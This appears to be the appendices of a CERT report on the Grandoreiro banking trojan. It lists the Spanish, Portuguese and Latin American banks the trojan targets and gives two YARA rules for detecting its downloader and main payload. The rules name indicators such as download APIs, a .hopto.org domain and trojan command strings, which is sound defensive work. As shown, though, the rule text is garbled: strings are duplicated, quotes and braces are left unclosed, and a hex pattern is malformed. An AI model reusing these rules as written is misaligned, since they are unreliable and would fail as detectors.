|BancodaAmazonia|ING|BICE| |Banpara|Pichincha|Ripley| |Santander|CaixaGeral|Bci| |Banese|Mediolanum|Chile| |Bradesco|Unicaja|BancoEstado| |AGY|TRIODOS|Falabella| |inter|ACTIVOBANK|Santander| |Sicoob|ACTIVOBANKPT|Scotiabank| |Sicredi|novobancopt|PortugalBBVA| |Caixa|santapt|bancobcr| |itau|MONTEPIOpt|BarclaysES| |nordeste|millenniumbcppt|BNPParibas| |paulista|Caixadirectapt|CaixaGuissona| |Scotiabank|EuroBicpt|Cajasur| |brb|ibercaja|CitiBusiness| |Cetelem|BancoAzteca|Commerzbank| |Banestes|Citibanamex|Deutsche| |Original|Banorte|EVOBanco| ----- |CajaRural|Scotiabank|BMN| |---|---|---| |Sabadell|BPI|MicroBank| |BANKINTER|Cecabank|MiBanco| |Bankia.es|natwest|| **_Table 2. Financial institutions affected by Grandoreiro_** ----- ### Appendix 2: Yara Rules of detection The following Yara rules detect the 2 versions of dll discussed in the study, both the downloader and the trojan itself: ``` rule Grandoreiro_Banker_Downloader { meta: author = "INCIBE-CERT" description = "Detects the Grandoreiro banking Trojan downloader" strings: $delphidll1 = { BA ?? ?? ?? ?? 83 7D 0C 01 75 ?? 50 52 C6 05 ?? ?? ?? ?? ?? 8B 4D 08 89 0D ?? ?? ?? ?? $delphidll2 = { 55 8B EC 83 C4 ?? B8 ?? ?? ?? ?? E8 ?? ?? FF FF E8 ? ?? FF FF 8D 40 00 } $str1 = " 2001, 2002 Mike Lischke" $str2 = "8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS" $str3 = "Archive already has SFX stub" $str4 = "Deflate64 compression method is not supported" $str5 = "Delphi Component" $str6 = "EDecompressionErrorneeded dictionary" $str7 = "MakeSFX error" $str8 = "Runtime error at 00000000" $str9 = "Web site: http://www.componentace.com" $str10 = "ScreenToClient" $str11 = "SFXStub property is not specified" $str12 = "SystemCurrentControlSettings Layouts" $str13 = "SystemParametersInfoA" $str13 = "SystemParametersInfoA" $str14 = "TAESCryptoTransform" $str14 = "TAESCryptoTransform $str15 = "TGetSiteInfoEvent" $str15 = "TGetSiteInfoEvent" $str16 = "$TMultiReadExclusiveWriteSynchronizer" $str17 = "to create a commercial product, please register and download" $str18 = "URLDownloadToFileA" $str19 = "VerLanguageNameA" $str20 = "WndProcPtr%.8X%.8X" $str20 = "WndProcPtr%.8X%.8X" $str21 = "you that your Personal Edition is provided for personal use only" $str22 = "Zip64Mode" $str22 = "Zip64Mode" $str22 = "Zip64Mode condition: uint16(0) == 0x5A4D // MZ and uint16(uint32(0x3C)+0x18) == 0x010B //MZ header at 0x3C and (uint16(uint32(0x3C)+0x16) & 0x2000) == 0x2000 //PE DLL signature and any of ($delphidll*) and all of ($str*) and (filesize > 1400KB and filesize < 3000KB) } ``` ----- ``` rule Grandoreiro_Banker_Trojan { meta: author = "INCIBE-CERT" description = "Detects the Grandoreiro banking Trojan" strings: $mzp = "MZP $str1 = "yIdIOHandlerSocket $str2 = "ATIVARCAPTURAFULL" $str3 = "ATIVARCAPTURAMAG" $str4 = "AutoSessionsPingT" $str5 = "v4.09 (2013.Q2)" $str6 = "CallNextHookEx" $str7 = "Cap.DfbBackingMode" $str8 = "CryptPlugin.AfterDisconnect" $str9 = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly" $str10 = "DELETAKL" $str11 = "DETONAPROCESSO" $str12 = "EXIBIRMZ" $str13 = "Gate_CryptPlugin" $str14 = "GetType method not available for TRtcDataRow" $str15 = "GUploadAnywhere_Super $str16 = ".hopto.org" $str17 = "Magnification.dll" $str18 = "RTC.DATASET.ROWS" $str19 = "Portable network graphics (AlphaControls)" $str20 = "RemoteThreadCallbacks TRtcThreadCallback.DestroyCallback" $str21 = "SUSPENDEACESSO" $str22 = "ZDecompress_str.InflateInit" condition: $mzp at 0 and all of ($str*) and (filesize > 140000KB and filesize < 400000KB) } ``` ----- -----